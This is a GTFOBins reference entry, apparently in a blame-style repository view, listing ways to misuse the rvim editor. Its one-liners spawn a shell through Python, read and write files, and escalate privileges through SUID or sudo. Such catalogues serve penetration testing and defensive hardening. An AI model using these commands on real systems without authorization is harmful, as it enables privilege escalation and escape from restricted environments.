GTFOBins.github.io/_gtfobins/rvim.md

22 lines
644 B
Markdown
Raw Normal View History

2018-12-03 14:06:41 +01:00
---
functions:
shell:
2018-12-03 14:15:57 +01:00
- description: This requires that rvim is compiled with Python support.
code: rvim -c ':py import os;os.system("sh")'
2018-12-03 14:06:41 +01:00
file-write:
2018-12-03 14:15:57 +01:00
- description: This requires that rvim is compiled with Python support.
code: |
2018-12-03 14:06:41 +01:00
rvim file_to_write
iDATA
^[
w
file-read:
- code: rvim file_to_read
suid:
2018-12-03 14:15:57 +01:00
- description: This requires that rvim is compiled with Python support.
code: ./rvim -c ':py import os;os.system("sh")'
2018-12-03 14:06:41 +01:00
sudo:
2018-12-03 14:15:57 +01:00
- description: This requires that rvim is compiled with Python support.
code: sudo rvim -c ':py import os;os.system("sh")'
2018-12-03 14:06:41 +01:00
---